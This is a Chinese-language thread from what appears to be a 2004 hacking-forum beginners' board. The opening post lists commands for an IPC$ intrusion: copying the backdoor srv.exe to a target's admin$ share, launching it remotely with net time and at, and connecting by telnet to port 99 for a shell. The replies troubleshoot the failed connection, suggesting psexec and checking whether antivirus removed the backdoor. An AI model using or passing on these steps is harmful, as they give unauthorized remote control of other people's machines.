论坛: 菜鸟乐园 标题: ipc$_______________________________________________________ 复制本贴地址    
作者: wyq980 [wyq980]    论坛用户   登录
C:\>copy srv.exe \\127.0.0.1\admin$\system32
\\将一次性后门srv.exe复制到对方的系统文件夹下,前提是admin$开启  

[4]
C:\>net time \\127.0.0.1
\\查看远程主机的当前时间

[5]
C:\>at \\127.0.0.1 时间 srv.exe
\\用at命令远程运行srv.exe,需要对方开启了'Task Scheduler'服务  

[6]
C:\>net time \\127.0.0.1
\\再次查看当前时间来估算srv.exe是否已经运行,此步可以省略

[7]    
C:\>telnet 127.0.0.1 99
\\开一个新窗口,用telnet远程登陆到127.0.0.1从而获得一个shell(不懂shell是什么意思?那你就把它想象成远程机器的控制权就好了,操作像DOS),99端口是srv.exe开的一次性后门的端口  

上面的我都做了 为什么telnet 的时候出现在端口99连接失败?

地主 发表时间: 04-12-16 12:27

回复: wyq980 [wyq980]   论坛用户   登录


B1层 发表时间: 04-12-16 13:04

回复: yesbluesky [yesbluesky]   论坛用户   登录
偶也是用psexec来开99端口的..它显示了good luck..md也是telnet 不行

B2层 发表时间: 04-12-16 13:39

回复: lhh2003 [lhh2003]   论坛用户   登录
命令基本正确,楼主能肯定srv.exe没有被对方的杀毒软件ok了吗?用dir srv.ex看一下!!!
srv.exe有些老,很多杀毒软件都能自动查出并杀之的。。。。。

B3层 发表时间: 04-12-16 18:43

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号